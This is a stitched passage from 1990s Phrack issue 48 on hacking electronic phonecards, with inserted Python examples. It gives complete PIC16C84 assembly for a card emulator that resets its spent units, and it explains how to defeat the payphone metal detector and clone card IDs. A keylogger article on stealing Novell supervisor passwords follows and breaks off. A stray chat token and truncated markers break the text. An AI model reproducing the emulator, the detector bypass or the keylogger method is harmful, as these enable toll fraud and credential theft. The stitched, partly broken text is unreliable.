                           $012: write(' - 10 Units - ',12-units,' Units left'); 
                           $024: write(' - 22 Units - ',24-units,' Units left'); 
                           $027: write(' - 25 Units - ',27-units,' Units left'); 
                           $032: write(' - 30 Units - ',32-units,' Units left'); 
                           $052: write(' - 50 Units - ',52-units,' Units left'); 
                           $067: write(' - 65 Units - ',67-units,' Units left'); 
                           $070: write(' - 70 Units - ',70-units,' Units left'); 
                           $102: write(' - 100 Units - ',102-units,' Units left'); 
                           $152: write(' - 150 Units - ',152-units,' Units left'); 
                         END; 
                   END; 
                   { write(' - NO ',Data[5]*$100+Data[6]); } 
             END; 
      END; 
END; 

PROCEDURE waiting; 
BEGIN send($00); 
      write('Enter a card in the reader and press a key ...'); 
      repeat until keypressed; 
      gotoxy(1,wherey); 
      clreol; 
END; 

PROCEDURE Full_Displaying; 
BEGIN writeln('Memory dump:'); 
      for i:=1 to 80 do write('-'); 
      for i:=1 to (byte_number div 6 + 1) do 
      BEGIN for j:=1 to 6 do 
            BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9); 
            END; 
            gotoxy(60,wherey); 
            for j:=1 to 6 do 
              if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' '); 
            writeln; 
      END; 
      for i:=1 to 80 do write('-'); 
      Card_Type; 
      writeln; 
END; 

PROCEDURE Short_Displaying; 
VAR j : integer; 
BEGIN for j:=1 to byte_number do 
      BEGIN write(d2h(Data[j]),' '); 
      END; 
      writeln; 
END; 

{ Reset the card, then read one bit and clock, 256 times } 
PROCEDURE Reading; 
VAR i,j   : integer; 
    Value : byte; 
BEGIN send($FE); 
      send($F8); 
      for i:=1 to 32 do 
      BEGIN Value:=0; 
            for j:=1 to 8 do 
            BEGIN Value:=Value*$02 + ((get and $08) div $08); 
                  send($FB); 
                  delay(1); 
                  send($F8); 
            END; 
            Data[i]:=Value; 
      END; 
      case displaying of 
        'F' :full_displaying; 
        'S' :short_displaying; 
      END; 
END; 

{ Set one bit of the card to "1": clock up to bit n, then apply the 
  programming pulse there and read the card back } 
PROCEDURE writing; 
VAR i,n:integer; 
    car:char; 
BEGIN write('Which bit do you want to set to "1": '); 
      readln(n); 
      displaying:='F'; 
      waiting; 
      car:=readkey; 
      send($FA); 
      send($F8); 
      for i:=1 to n do 
      BEGIN send($F9); 
            if i=n then 
            BEGIN send($FD); 
                  delay(20); 
                  send($FF); 
                  delay(20); 
            END; 
            send($FB); 
      END; 
      reading; 
END; 

PROCEDURE Saving; 
VAR filename : string; 
    f        : text; 
    i        : word; 
BEGIN write('Enter the filename : '); 
      readln(filename); 
      assign(f,filename); 
      rewrite(f); 
      for i:=1 to byte_number do write(f,d2h(Data[i]),' '); 
      close(f); 
END; 

PROCEDURE initialize; 
VAR i : integer; 
BEGIN byte_number:=32; 
      displaying:='F'; 
      clrscr; 
      writeln(' 1 - to dump a 256 bits card'); 
      writeln(' 2 - to dump a 128 bits card'); 
      writeln(' F - to display in full format'); 
      window(41,1,80,25); 
      writeln(' S - to display in short format'); 
      writeln(' F2 - to save in a file'); 
      writeln(' Q - to exit the program'); 
      window(1,4,80,25); 
      for i:=1 to 80 do write('='); 
      window(1,5,80,25); 
END; 

BEGIN initialize; 
      repeat waiting; 
            car:=upcase(readkey); 
            case car of 
              'W'     : writing; 
              'Q'     : ; 
              '1'     : byte_number:=32; 
              '2'     : byte_number:=16; 
              'F','S' : displaying:=car; 
              #00     : BEGIN car:=readkey; 
                              if car=#60 then saving; 
                        END; 
              else reading; 
            END; 
      until car='Q'; 
END. 


cut here (end) 


Stephane BAUSSON 
Engineering student at ENSEM (Nancy - France) 
Smail: 4, Rue de Grand, F-88630 CHERMISEY, France 
Email: sbausson@ensem.u-nancy.fr 


<End of text quoted from Stephane Bausson’s text about the telephone cards>. 
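The card and reader sequence described in Bausson's sections I-3 to I-7, as an added Python example that is neither his program nor the emulator that follows: a bit-level model of a 256-bit French/ISO card with its fuse-protected ID area and one-way EPROM cells, the reader's reset-then-clock dump, a decoder that generalises the Pascal Card_Type to all of the listed country and capacity codes by counting set bits in the units area, and the single-unit debit a payphone performs. The builder code 0x81 and the card contents are constructed for the example, not read from a real card.

```python
"""Model of a 256 x 1 bit synchronous telecard and of its reader.
Added example, not Bausson's code; the card contents are constructed."""
from dataclasses import dataclass

ID_BITS = 96                      # bits 1..96: fuse-protected manufacturer area
UNITS_FIRST, UNITS_LAST = 13, 31  # bytes (1-based) holding the units area

# French card ($03 in byte 2): byte 12 -> capacity, first ten units test-fused
FRENCH_CAPACITY = {0x13: 120, 0x06: 50, 0x05: 40}
FRENCH_TEST_FUSED = 10
# $83 card: bytes 3-4 -> capacity, first two units test-fused
OTHER_CAPACITY = {0x8012: 10, 0x8024: 22, 0x8027: 25, 0x8032: 30,
                  0x8052: 50, 0x8082: 80, 0x8102: 100, 0x8152: 150}
OTHER_TEST_FUSED = 2
COUNTRY = {0x1E: "Sweden", 0x22: "Spain", 0x30: "Norway", 0x33: "Andorra",
           0x3C: "Ireland", 0x47: "Portugal", 0x55: "Czech Republic",
           0x5F: "Gabon", 0x65: "Finland"}


@dataclass
class SyncMemoryCard:
    """256 x 1 bit EPROM with serial output, as seen on the contacts."""
    mem: list                      # 32 bytes; bit 0 of the card = MSB of byte 0
    addr: int = 0

    def reset(self):               # Reset pulse: address counter back to 0
        self.addr = 0

    def clock(self):               # rising edge on Clk: next address
        self.addr = (self.addr + 1) % 256

    def out(self):                 # serial output: the addressed bit
        return (self.mem[self.addr >> 3] >> (7 - (self.addr & 7))) & 1

    def write(self, vpp_21v, rw):
        """Programming pulse. EPROM cells only ever go 0 -> 1, and the
        lock-out fuse blown in the factory refuses any write below bit 96."""
        if not (vpp_21v and rw) or self.addr < ID_BITS:
            return False           # no 21 V, or manufacturer area: ignored
        self.mem[self.addr >> 3] |= 0x80 >> (self.addr & 7)
        return True


def read_card(card):
    """Reader sequence of the Pascal program: reset, then 256 times read
    the current bit and clock. Returns the 32 bytes, MSB first."""
    card.reset()
    bits = []
    for _ in range(256):
        bits.append(card.out())
        card.clock()
    return [int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, 256, 8)]


def decode(data):
    """Country, capacity and units left from a 32-byte dump. Units left =
    capacity - (bits set in the units area - factory test-fused bits)."""
    d = [None] + list(data)        # 1-based, like Data[] in the Pascal listing
    used_bits = sum(bin(b).count("1") for b in d[UNITS_FIRST:UNITS_LAST + 1])
    if d[2] == 0x03:
        where, cap, fused = "France", FRENCH_CAPACITY.get(d[12]), FRENCH_TEST_FUSED
    elif d[2] == 0x83:
        where = COUNTRY.get(d[12], "unknown")
        cap, fused = OTHER_CAPACITY.get(d[3] << 8 | d[4]), OTHER_TEST_FUSED
    else:
        return {"country": "unknown", "capacity": None, "left": None}
    left = None if cap is None else cap - (used_bits - fused)
    return {"country": where, "capacity": cap, "left": left}


def payphone_debit(card):
    """One unit as a payphone takes it: walk to the first unused unit bit
    and burn it with 21 V. Returns the bit address burnt, None if empty."""
    card.reset()
    for _ in range(ID_BITS):
        card.clock()
    while card.addr < UNITS_LAST * 8:
        if card.out() == 0:
            card.write(vpp_21v=True, rw=True)
            return card.addr
        card.clock()
    return None


def make_french_120(used):
    """Constructed 120-unit French card with `used` units already spent
    (builder code 0x81 is a made-up value)."""
    mem = [0x81, 0x03] + [0] * 9 + [0x13] + [0] * 19 + [0xFF]
    for i in range(FRENCH_TEST_FUSED + used):   # test-fused bits + spent units
        mem[12 + (i >> 3)] |= 0x80 >> (i & 7)
    return SyncMemoryCard(mem)
```

The write path is where the security of the scheme lives: there is no key anywhere, only the physics of the EPROM cell (a burnt bit never reads 0 again) and the fuse over the first 96 bits, so a genuine card can be drained but not refilled or re-identified.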
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 11 of 18 


Electronic Telephone Cards: How to make your own! 


(continued) 


The Program: 

Well, when I saw this phile about the cards the first time, about a year 
ago, I quickly realized that this system is very insecure and really 
needs to be hacked. So, now I present you with a piece of software for 
the PIC 16C84 RISC micro-controller from Microchip that will take care 
of emulating the cards used by Schlumberger and others. This system is 
to be found in Scandinavia (Sweden, Norway and Finland), Spain, France 
and other countries. I do know that France probably needs some small 
modifications for this to work, but I see no reason as to why it 
shouldn't do so! For this to work, you need to have access to a PROM 
burner which can handle the PIC 16C84, or you might just build one 
yourself as I include some plans for that in the UUEncoded block to be 
found at the end of this phile. First of all, you have to read off the 
first 12 bytes of data from a valid card from the country you wish your 
emulator to work in. This is because I don't think it would be a good idea 
to publish stolen card identities in Phrack. Then you simply enter those 
12 bytes of data in the proper place in my program and compile it. 
That's it... And since I happened to choose a version of the PIC with 
internal Data EEPROM, that means that the first 12 locations of the Data 
EEPROM should contain the card ID bytes. As of today this code should 
work smooth and fine, but maybe you'll need to modify it later on when 
Schlumberger gets tired of my hack. But since the PIC is a very fast and 
powerful micro-controller it might be quite hard for them to come up 
with a solution to this problem. Let's have a look at the PIC Software! 
(Note that the current version of Microchip's PICSTART 16B package is 
unable to program the DATA EEPROM array in the 16C84, so if you are going 
to use that one, use the other version of the source code which you'll 
find in the UUEncoded part!). 

<Start of TELECARD.ASM> 
        TITLE   "ISO 7816 Synchronous Memory Card Emulator" 
        LIST    P=PIC16C84, R=HEX 
        INCLUDE "PICREG.EQU" 

; PIC16C84 I/O Pin Assignment List 

CRD_CLK equ     0               ; RB0 + RA4 = Card Clock 
CRD_DTA equ     0               ; RA0 = Card Data Output 
CRD_RST equ     1               ; R
<｜end▁of▁sentence｜>B1 = Card Reset, Low-Active 
CRD_WE  equ     7               ; RB7 = Card Write-Enable, Hi-Active 

; PIC16C84 RAM Register Assignments 

CRD_ID  equ     0x00c           ; Smartcard ID, 12 bytes 
FUSCNT  equ     0x018           ; Fused units counter 
BITCNT  equ     0x019           ; Bitcounter 
LOOPCNT equ     0x01a           ; Loop Counter 
EE_FLAG equ     0x01b           ; EEPROM Write Flag 
TEMP1   equ     0x01c           ; Temporary Storage #1 
TEMP2   equ     0x01d           ; Temporary Storage #2 
TEMP3   equ     0x01e           ; Temporary Storage #3 
TEMP4   equ     0x01f           ; Temporary Storage #4 
TEMP_W  equ     0x02e           ; Temporary W Save Address 
TEMP_S  equ     0x02f           ; Temporary STATUS Save Address 

        org     0x2000          ; Chip ID Data 
        dw      042,042,042,042 

        org     0x2007          ; Configuration Fuses 
        dw      B'00000001' 

        org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!) 
        db      0x081,0x042,0x000,0x011,0x022,0x033 
        db      0x044,0x055,0x066,0x077,0x011,0x084 
        db      0x002           ; Default used up credits value 

        org     PIC84           ; Reset-vector 
        goto    INIT            ; Jump to initialization routine 

        org     INTVEC          ; Interrupt-vector 
        push                    ; Save registers 
        call    INTMAIN         ; Call main interrupt routine 
        pop                     ; Restore registers 
        retfie                  ; return from interrupt & clear flag 

        org     0x010           ; Start address for init rout. 
INIT    bsf     STATUS,RP0      ; Access register bank 1 
        clrwdt                  ; Clear watchdog timer 
        movlw   B'11101000'     ; OPTION reg. settings 
        movwf   OPTION          ; Store in OPTION register 
        movlw   B'11111110'     ; Set PORT A Tristate Latches 
        movwf   TRISA           ; Store in PORT A tristate register 
        movlw   B'11111111'     ; Set PORT B Tristate Latches 
        movwf   TRISB           ; Store in PORT B tristate register 
        bcf     STATUS,RP0      ; Access register bank 0 
        clrf    RTCC            ; Clear RTCC 
        clrf    PORTA           ; Clear PORTA 
        clrf    PORTB           ; Clear PORTB 
        movlw   0d              ; 13 bytes to copy 
        movwf   LOOPCNT         ; Store in LOOPCNT 
        movlw   0c              ; Start storing at $0c in RAM 
        movwf   FSR             ; Store in FSR 
        clrf    EEADR           ; Start at EEPROM Address 0 
EECOPY  bsf     STATUS,RP0      ; Access register bank 1 
        bsf     EECON1,RD       ; Set EECON1 Read Data Flag 
        bcf     STATUS,RP0      ; Access register bank 0 
        movfw   EEDATA          ; Read one byte of EEPROM Data 
        movwf   INDIR           ; Store in RAM pointed at by FSR 
        incf    FSR             ; Increase FSR pointer 
        incf    EEADR           ; Increase EEPROM Address Pointer 
        decfsz  LOOPCNT,1       ; Decrease LOOPCNT until it's 0 
        goto    EECOPY          ; Go and get some more bytes! 
        bsf     STATUS,RP0      ; Access register bank 1 
        bcf     EECON1,EEIF     ; Clear EEPROM Write Int. Flag 
        bcf     EECON1,WREN     ; EEPROM Write Disable 
        bcf     STATUS,RP0      ; Access register bank 0 
        movlw   B'10010000'     ; Enable INT Interrupt 
        movwf   INTCON          ; Store in INTCON 
MAIN    bsf     STATUS,RP0      ; Access register bank 1 
        btfsc   EECON1,WR       ; Check if EEPROM Write Flag Set 
        goto    MAIN            ; Skip if EEPROM Write is Completed 
        bcf     EECON1,EEIF     ; Reset Write Completion Flag 
        bcf     EECON1,WREN     ; EEPROM Write Disable 
        bcf     STATUS,RP0      ; Access register bank 0 
        btfss   EE_FLAG,LSB     ; Check for EEPROM Write Flag 
        goto    MAIN            ; If not set, jump back and wait some more 
        clrf    EE_FLAG         ; Clear EEPROM Write Flag 
        movlw   0c              ; Units is stored in byte $0c 
        movwf   EEADR           ; Store in EEPROM Address Counter 
        movfw   FUSCNT          ; Get fused units counter 
        movwf   EEDATA          ; Store in EEDATA 
        bsf     STATUS,RP0      ; Access register bank 1 
        bsf     EECON1,WREN     ; EEPROM Write Enable 
        bcf     INTCON,GIE      ; Disable all interrupts 
        movlw   055             ; Magic Number #1 for EEPROM Write 
        movwf   EECON2          ; Store in EECON2 
        movlw   0aa             ; Magic Number #2 for EEPROM Write 
        movwf   EECON2          ; Store in EECON2 
        bsf     EECON1,WR       ; Execute EEPROM Write 
        bsf     INTCON,GIE      ; Enable all interrupts again! 
        bcf     STATUS,RP0      ; Access register bank 0 
        goto    MAIN            ; Program main loop! 

INTMAIN btfsc   INTCON,INTF     ; Check for INT Interrupt 
        goto    INTMAIN2        ; If set, jump to INTMAIN2 
        movlw   B'00010000'     ; Enable INT Interrupt 
        movwf   INTCON          ; Store in INTCON 
        return 
INTMAIN2 
        bcf     STATUS,RP0      ; Access register bank 0 
        bsf     PORTA,CRD_DTA   ; Set Data Output High 
        btfsc   PORTB,CRD_RST   ; Check if reset is low 
        goto    NO_RST          ; If not, skip reset sequence 
        movfw   RTCC            ; Get RTCC Value 
        movwf   TEMP4           ; Store in TEMP4 
        clrf    RTCC            ; Clear RTCC 
        movlw   055             ; Subtract $55 from TEMP4 
        subwf   TEMP4,0         ; to check for card reset.... 
        bnz     NO_RST2         ; If not zero, jump to NO_RST2 
        movlw   02              ; Unused one has $02 in FUSCNT 
        movwf   FUSCNT          ; Store full value in FUSCNT 
        bsf     EE_FLAG,LSB     ; Set EEPROM Write Flag 
NO_RST2 bcf     INTCON,INTF     ; Clear INT Interrupt Flag 
        return                  ; Mission Accomplished, return to sender 
NO_RST  movfw   RTCC            ; Get RTCC Value 
        movwf   BITCNT          ; Copy it to BITCNT 
        movwf   TEMP1           ; Copy it to TEMP1 
        movwf   TEMP2           ; Copy it to TEMP2 
        movlw   060             ; Load W with $60 
        subwf   TEMP1,0         ; Subtract $60 from TEMP1 
        bz      CREDIT          ; If it is equal to $60 
        bc      CREDIT          ; or greater, then skip to units area 
        rrf     TEMP2           ; Rotate TEMP2 one step right 
        rrf     TEMP2           ; Rotate TEMP2 one step right 
        rrf     TEMP2           ; Rotate TEMP2 one step right 
        movlw   0f              ; Load W with $f 
        andwf   TEMP2,1         ; And TEMP2 with W register 
        movfw   TEMP2           ; Load W with TEMP2 
        addlw   0c              ; Add W with $0c 
        movwf   FSR             ; Store data address in FSR 
        movfw   INDIR           ; Get data byte pointed at by FSR 
        movwf   TEMP3           ; Store it in TEMP3 
        movlw   07              ; Load W with $07 
        andwf   TEMP1,1         ; And TEMP1 with $07 
        bz      NO_ROT          ; If result is zero, skip shift loop 
ROTLOOP rlf     TEMP3           ; Shift TEMP3 one step left 
        decfsz  TEMP1,1         ; Decrement TEMP1 until zero 
        goto    ROTLOOP         ; If not zero, repeat until it is! 
NO_ROT  btfss   TEMP3,MSB       ; Check if MSB of TEMP3 is set 
        bcf     PORTA,CRD_DTA   ; Clear Data Output 
        bcf     INTCON,INTF     ; Clear INT Interrupt Flag 
        return                  ; Mission Accomplished, return to sender 
CREDIT  btfss   PORTB,CRD_WE    ; Check if Card Write Enable is High 
        goto    NO_WRT          ; Abort write operation if not... 
        btfss   PORTB,CRD_RST   ; Check if Card Reset is High 
        goto    NO_WRT          ; Abort write operation if not... 
        incf    FUSCNT          ; Increase used-up units counter 
        bsf     EE_FLAG,LSB     ; Set EEPROM Write-Flag 
        bcf     INTCON,INTF     ; Clear INT Interrupt Flag 
        return                  ; Mission Accomplished, return to sender 
NO_WRT  movlw   060             ; Load W with $60 
        subwf   BITCNT,1        ; Subtract $60 from BITCNT 
        movfw   FUSCNT          ; Load W with FUSCNT 
        subwf   BITCNT,1        ; Subtract FUSCNT from BITCNT 
        bnc     FUSED           ; If result is negative, unit is fused 
        bcf     PORTA,CRD_DTA   ; Clear Data Output 
FUSED   bcf     INTCON,INTF     ; Clear INT Interrupt Flag 
        return                  ; Mission Accomplished, return to sender 

        END 


<End of TELECA 


<Start of PICREG.EQU>

; PIC16Cxx Micro-controller Include File

PIC54   equ     0x1ff   ; PIC16C54 Reset Vector
PIC55   equ     0x1ff   ; PIC16C55 Reset Vector
PIC56   equ     0x3ff   ; PIC16C56 Reset Vector
PIC57   equ     0x7ff   ; PIC16C57 Reset Vector
PIC71   equ     0x000   ; PIC16C71 Reset Vector
PIC84   equ     0x000   ; PIC16C84 Reset Vector
INTVEC  equ     0x004   ; PIC16C71/84 Interrupt Vector

INDIR   equ     0x000   ; Indirect File Reg Address Register
RTCC    equ     0x001   ; Real Time Clock Counter
PCL     equ     0x002   ; Program Counter Low Byte
STATUS  equ     0x003   ; Status Register
FSR     equ     0x004   ; File Select Register
PORTA   equ     0x005   ; Port A I/O Register
PORTB   equ     0x006   ; Port B I/O Register
PORTC   equ     0x007   ; Port C I/O Register
ADCON0  equ     0x008   ; PIC16C71 A/D Control Reg 0
ADRES   equ     0x009   ; PIC16C71 A/D Converter Result Register
EEDATA  equ     0x008   ; PIC16C84 EEPROM Data Register
EEADR   equ     0x009   ; PIC16C84 EEPROM Address Register
PCLATH  equ     0x00a   ; Program Counter High Bits
INTCON  equ     0x00b   ; Interrupt Control Register
TRISA   equ     0x005   ; Port A I/O Direction Register
TRISB   equ     0x006   ; Port B I/O Direction Register
TRISC   equ     0x007   ; Port C I/O Direction Register
ADCON1  equ     0x008   ; PIC16C71 A/D Control Reg 1
EECON1  equ     0x008   ; PIC16C84 EEPROM Control Reg. 1
EECON2  equ     0x009   ; PIC16C84 EEPROM Control Reg. 2
OPTION  equ     0x001   ; Option Register
MSB     equ     0x007   ; Most-Significant Bit
LSB     equ     0x000   ; Least-Significant Bit

; Status Register (f03) Bits

CARRY   equ     0x000   ; Carry Bit
C       equ     0x000   ; Carry Bit
DCARRY  equ     0x001   ; Digit Carry Bit
DC      equ     0x001   ; Digit Carry Bit
Z_B     equ     0x002   ; Zero Bit
Z       equ     0x002   ; Zero Bit
P_DOWN  equ     0x003   ; Power Down Bit
PD      equ     0x003   ; Power Down Bit
T_OUT   equ     0x004   ; Watchdog Time-Out Bit
TO      equ     0x004   ; Watchdog Time-Out Bit
RP0     equ     0x005   ; Register Page Select 0
RP1     equ     0x006   ; Register Page Select 1
IRP     equ     0x007   ; Indirect Addressing Reg. Page Sel.

; INTCON Register (f0b) Bits

RBIF    equ     0x000   ; RB Port change interrupt flag
INTF    equ     0x001   ; INT Interrupt Flag
RTIF    equ     0x002   ; RTCC Overflow Interrupt Flag
RBIE    equ     0x003   ; RB Port Change Int. Enable
INTE    equ     0x004   ; INT Interrupt Enable
RTIE    equ     0x005   ; RTCC Overflow Interrupt Enable
ADIE    equ     0x006   ; PIC16C71 A/D Interrupt Enable
EEIE    equ     0x006   ; PIC16C84 EEPROM Write Int. Enable
GIE     equ     0x007   ; Global Interrupt Enable

; OPTION Register (f81) Bits

PS0     equ     0x000   ; Prescaler Bit 0
PS1     equ     0x001   ; Prescaler Bit 1
PS2     equ     0x002   ; Prescaler Bit 2
PSA     equ     0x003   ; Prescaler Assignment Bit
RTE     equ     0x004   ; RTCC Signal Edge Select
RTS     equ     0x005   ; RTCC Signal Source Select
INTEDG  equ     0x006   ; Interrupt Edge Select
RBPU    equ     0x007   ; Port B Pull-up Enable

; ADCON0 Register (f08) Bits

ADON    equ     0x000   ; A/D Converter Power Switch
ADIF    equ     0x001   ; A/D Conversion Interrupt Flag
ADGO    equ     0x002   ; A/D Conversion Start
CHS0    equ     0x003   ; A/D Converter Channel Select 0
CHS1    equ     0x004   ; A/D Converter Channel Select 1
ADCS0   equ     0x006   ; A/D Conversion Clock Select 0
ADCS1   equ     0x007   ; A/D Conversion Clock Select 1

; ADCON1 Register (f88) Bits

PCFG0   equ     0x000   ; RA0-RA3 Configuration Bit 0
PCFG1   equ     0x001   ; RA0-RA3 Configuration Bit 1

; EECON1 Register (f88) Bits

RD      equ     0x000   ; PIC16C84 EEPROM Read Data Flag
WR      equ     0x001   ; PIC16C84 EEPROM Write Data Flag
WREN    equ     0x002   ; PIC16C84 EEPROM Write Enable Flag
WRERR   equ     0x003   ; PIC16C84 EEPROM Write Error Flag
EEIF    equ     0x004   ; PIC16C84 EEPROM Interrupt Flag

; Some useful macros...

PUSH    macro
        movwf   TEMP_W
        swapf   STATUS,W
        movwf   TEMP_S
        endm

POP     macro
        swapf   TEMP_S,W
        movwf   STATUS
        swapf   TEMP_W
        swapf   TEMP_W,W
        endm

<End of PICREG.EQU>.


The Security System: 


The security of the Schlumberger card system depends strongly on two 
things.  The first is the metal detector in the card reader, which senses if 
there is any metal on the card where there shouldn't be any metal.  Circuit 
traces on a home built card are definitely made of metal.  So, we have to 
figure out a way of getting around this problem...  Well, that isn't 
really too hard!  They made one really big mistake: If the metal detector 
is grounded, it doesn't work!!  If you look at the printout of my layouts 
for this card you'll find one big area of the board that is rectangle 
shaped.  In this area you should make a big blob of solder that is 
between 2-3 millimeters high (approximately!).  When the card slides into 
the phone, the blob should be touching the metal detector, and since the 
blob is connected to ground the detector is also being grounded.  The 
phone also counts the number of times the metal detector gets triggered 
by foreign objects in the card reader (meaning that the phone company's 
security staff can see if someone's attempting to use a fake card that 
doesn't have this counter-measure on it!), and this is of course included 
in the daily service report the phone sends to the central computer. 


The second security lies in the card's first 12 bytes; it's not just what 
it appears to be, a serial number, it's more than that.  Part of the 
first byte is a checksum of the number of 1's in the 11 bytes following 
it.  Then byte 2 is always $83, identifying the card as an electronic 
phonecard.  Bytes 3 and 4 are the number of units on the card: the first 
nibble of byte 3 is always $1 and then in the remaining three nibbles 
the number of units is stored in BCD code, for example $11,$22 means 120 
units (two units are always fused at the factory as a test, see the text 
by Stephane Bausson!).  Then we have 4 bytes of card serial number data, 2 
bytes of card checksum (calculated with a 16 bit key stored in the 
payphone's ROM), 1 byte that is always $11, and then at last, byte 12, 
which is the country identifier. 
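To make the header layout above concrete, here is a decoder for the 12-byte block exactly as the text describes it (an added example, not code from the article). The text does not say which bits of byte 1 hold the ones-count, so the decoder only reports the count it computes; the 2-byte keyed checksum cannot be recomputed without the payphone's key, so it is passed through. The sample header bytes are constructed placeholders.

```python
"""Decoder for the 12-byte phonecard header described in the text.

Added example for this page.  Field positions follow the text; the sample
header below is constructed and the serial, checksum and country values in
it are placeholders, not values from any real card.
"""

CARD_TYPE_PHONECARD = 0x83   # byte 2 of every electronic phonecard
FUSED_TEST_UNITS = 2         # units burned at the factory as a test
FIXED_BYTE_11 = 0x11         # byte 11 is always $11


def bcd_digit(nibble):
    """Reject nibbles that are not valid BCD digits."""
    if nibble > 9:
        raise ValueError("0x%X is not a BCD digit" % nibble)
    return nibble


def decode_header(hdr):
    """Parse and sanity-check the first 12 bytes; returns a dict of fields."""
    hdr = bytes(hdr)
    if len(hdr) != 12:
        raise ValueError("expected 12 header bytes, got %d" % len(hdr))
    if hdr[1] != CARD_TYPE_PHONECARD:
        raise ValueError("byte 2 is 0x%02X: not an electronic phonecard" % hdr[1])
    if hdr[2] >> 4 != 0x1:
        raise ValueError("first nibble of byte 3 must be $1")
    if hdr[10] != FIXED_BYTE_11:
        raise ValueError("byte 11 must be $11")
    # Three BCD nibbles: low nibble of byte 3, then both nibbles of byte 4.
    units_coded = (bcd_digit(hdr[2] & 0xF) * 100
                   + bcd_digit(hdr[3] >> 4) * 10
                   + bcd_digit(hdr[3] & 0xF))
    return {
        # Count of 1 bits over bytes 2..12; the text says part of byte 1
        # holds a checksum of this count but not where, so it is only reported.
        "ones_in_bytes_2_to_12": sum(bin(b).count("1") for b in hdr[1:]),
        "units_coded": units_coded,
        "units_usable": units_coded - FUSED_TEST_UNITS,
        "serial": hdr[4:8].hex(),
        "keyed_checksum": hdr[8:10].hex(),   # needs the payphone's 16-bit key
        "country": hdr[11],
    }


# Constructed sample: $11,$22 in bytes 3-4 is the 120-unit example from the
# text; byte 1, serial, checksum and country are placeholders.
SAMPLE_HEADER = bytes([0x00, 0x83, 0x11, 0x22,
                       0x12, 0x34, 0x56, 0x78,
                       0x00, 0x00, 0x11, 0x05])

if __name__ == "__main__":
    for name, value in decode_header(SAMPLE_HEADER).items():
        print("%-22s %s" % (name, value))
```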


The Parts Needed: 

01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package) 
01 * 4 MHz Ceramic Resonator, Surface Mounted 
02 * 22 pF Capacitors, Surface Mounted (Size 1206) 
01 * 0.8mm thick single sided circuit board with P20 photoresist 


The Construction: 

Since this project is obviously not intended for the novice in 
electronics I will not go into the basic details of soldering/etching 
circuit boards. If you do not know much of this, ask a friend who does 
for help. If you want to reach me for help, write to Phrack and ask them 
to forward the letter to me as I wish to remain anonymous - This project 
will probably upset a lot of phone companies and last but not least the 
guys at Schlumberger Tech. 


The UUEncoded Part: 


In this part of the phile you will find circuit board layouts for Tango 
PCB as well as HP LaserJet binary files which will output the layout 
when printed from DOS with the PRINT command. 


You will also find another version of the source code to use if your PIC 
programmer can’t handle the programming of the 64 byte Data EEPROM 
array. 


<UUEncoded Part Begins Here>. 
section 1 of uuencode 5.22 of file telecard.zip 

<UUEncoded Part Ends Here!>. 
==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 12 of 18 


COMBOKEY and the Simplistic Art of PC Hacking 
Hope 
KeyTrap Revisited 


by Sendai 
(with apologies to Dcypher) 
NOTE: Of course I take no responsibility when you use this and get 
kicked out of school or something stupid. Besides, why would you be so 
stupid as to get caught in the first place? :-) So be careful, and have 
fun. Don’t get stupid. 


WHAT YOU NEED FOR ANY OF THIS TO MAKE SENSE: 

* At least a reading knowledge of TurboPascal and 8086 assembly 

* A tolerable understanding of how the PC actually works or 

* A copy of Queue’s "MS-DOS Programmer’s Reference" 

* A copy of that yellow-spined "Indispensable PC Hardware Reference" book 




ON WITH IT... 

It was with a little dissatisfaction that I read Dcypher’s KeyTrap 
article the other day (so I’m back-logged a few issues, so sue me!) 

I’ve been foolin’ around with a version of this that I first wrote about 
five years ago during high school, and well, I thought mine was a little 
easier to understand. 


So I’m gonna show you my version, actually explain how the damn thing 
works, and hope somebody out there has their day brightened by using 
this program. 


Note that the only reason I wrote this thing was to record passwords on 
a Novell net. It will record all keypresses, but it really has limited 
use other than hacking. 


Fun fact: With this program, it has taken me an average of about six 
hours to snag supervisor on every Novell net I’ve nailed. And I’m sure 
you can do better. ;-) 


PC KEYBOARD HANDLING 101 

Okay, a quick review for those PC newbies out there. When a key is 
pressed on a PC, it generates an interrupt 9 (keyboard interrupt), 
causing the machine to look up the address of the 9th Interrupt Service 
Routine. The ISR is typically in ROM; the interrupt vector itself is 
not. 


A key recorder is a program that simply latches itself into the 
interrupt 9 handler by replacing the old vector with its own address. 
By doing this, every time a key is pressed, we know about it. 


ENTER COMBOKEY (That’d be the key recorder) 

I differ with my strategy from Dcypher in that I don't bother going 
directly to the keyboard hardware.  COMBOKEY just goes ahead and calls 
the old ISR and then looks in the BIOS keyboard buffer to see what the 
key was.  Yeah, you don't get the funky-ass key combinations like 
control-shift-right-alt-F2-Z, but hey, I'm just after the passwords. 


When a new key is pressed, it's dumped in the buffer.  When the buffer 
is full, nothing happens.  I'll leave writing it to a file as an 
exercise to the reader. 


My favorite feature, if I may say so myself, is the fact that COMBOKEY 
has an API in it, sort of.  Interrupt 255 is also latched and provides 
the "user" an interface to the presently running copy of COMBOKEY.  But 
not just anyone can go poking into 255 to kill COMBOKEY or get a buffer 
dump or whatever.  First, you gotta send a combination. 
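One defensive check that follows from the above (an added example, not code from the article): compare the INT 9 and INT 255 vectors against a snapshot of the interrupt vector table taken on a known-clean boot, and flag the pair being claimed by the same resident code segment. The vector-table bytes here are constructed stand-ins for the 1 KB table at 0000:0000, and the ROM_FLOOR segment threshold is an assumption.

```python
"""Interrupt-vector check for the INT 9 / INT FFh hooking described above.

Added example for this page.  Both vector tables below are constructed;
on a real DOS machine the 256 offset:segment entries would be read from
0000:0000.  ROM_FLOOR is an assumed boundary, not something from the text.
"""

import struct

IVT_ENTRIES = 256
ROM_FLOOR = 0xC000      # assumption: segments from C000h up are adapter/BIOS ROM


def build_ivt(entries):
    """Construct a vector table from {int_no: (segment, offset)}; the rest is 0000:0000."""
    ivt = bytearray(IVT_ENTRIES * 4)
    for int_no, (seg, off) in entries.items():
        # Each entry is stored offset word first, then segment word, little-endian.
        struct.pack_into("<HH", ivt, int_no * 4, off, seg)
    return bytes(ivt)


def vector(ivt, int_no):
    """Return (segment, offset) of interrupt int_no from a raw table."""
    off, seg = struct.unpack_from("<HH", ivt, int_no * 4)
    return seg, off


def region(seg):
    return "ROM" if seg >= ROM_FLOOR else "conventional RAM"


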